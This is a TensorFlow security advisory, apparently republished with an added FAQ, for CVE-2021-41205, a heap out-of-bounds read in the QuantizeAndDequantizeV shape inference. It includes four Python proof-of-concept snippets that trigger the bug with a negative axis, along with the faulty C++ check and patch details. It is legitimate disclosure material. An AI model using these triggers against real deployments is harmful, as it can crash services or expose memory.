CVE-2021-41205: Heap OOB read in all `tf.raw_ops.QuantizeAndDequantizeV*` ops
Impact The shape inference functions for the QuantizeAndDequantizeV operations can trigger a read outside of bounds of heap allocated array as illustrated in the following sets of PoCs:
python import tensorflow as tf
@tf.function def test(): data=tf.rawops.QuantizeAndDequantizeV4Grad( gradients=[1.0,1.0], input=[1.0,1.0], inputmin=[1.0,10.0], inputmax=[1.0,10.0], axis=-100) return data
test()
python import tensorflow as tf
@tf.function def test(): data=tf.rawops.QuantizeAndDequantizeV4( input=[1.0,1.0], inputmin=[1.0,10.0], inputmax=[1.0,10.0], signedinput=False, numbits=10, rangegiven=False, roundmode='HALFTOEVEN', narrowrange=False, axis=-100) return data
test()
python import tensorflow as tf
@tf.function def test(): data=tf.rawops.QuantizeAndDequantizeV3( input=[1.0,1.0], inputmin=[1.0,10.0], inputmax=[1.0,10.0], signedinput=False, numbits=10, rangegiven=False, narrowrange=False, axis=-100) return data
test()
python import tensorflow as tf
@tf.function def test(): data=tf.rawops.QuantizeAndDequantizeV2( input=[1.0,1.0], inputmin=[1.0,10.0], inputmax=[1.0,10.0], signedinput=False, numbits=10, rangegiven=False, roundmode='HALFTOEVEN', narrowrange=False, axis=-100) return data
test()
In all of these cases, axis is a negative value different than the special value used for optional/unknown dimensions (i.e., -1). However, the code ignores the occurences of these values:
cc ... if (axis != -1) { ... c->Dim(input, axis); ... }
Patches We have patched the issue in GitHub commit 7cf73a2274732c9d82af51c2bc2cf90d13cd7e6d.
The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
For more information Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.
Attribution This vulnerability has been reported by members of the Aivul Team from Qihoo 360.
Other sources
TensorFlow is an open source platform for machine learning. In affected versions the shape inference functions for the QuantizeAndDequantizeV operations can trigger a read outside of bounds of heap allocated array. The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
— MITRE
Affected Software
Remediation
Event History
Frequently Asked Questions
What is the severity of CVE-2021-41205?
CVE-2021-41205 has a medium severity rating due to potential exploitation leading to read outside of bounds in TensorFlow.
How do I fix CVE-2021-41205?
To fix CVE-2021-41205, upgrade to TensorFlow versions 2.4.4, 2.5.2, or 2.6.1.
What versions of TensorFlow are affected by CVE-2021-41205?
CVE-2021-41205 affects TensorFlow versions prior to 2.4.4, between 2.5.0 and 2.5.2, and between 2.6.0 and 2.6.1.
What are the potential impacts of CVE-2021-41205?
CVE-2021-41205 may allow an attacker to create unexpected read operations that can lead to application crashes.
Is there a workaround for CVE-2021-41205?
There are no recommended workarounds for CVE-2021-41205, and applying the upgrade is the best mitigation.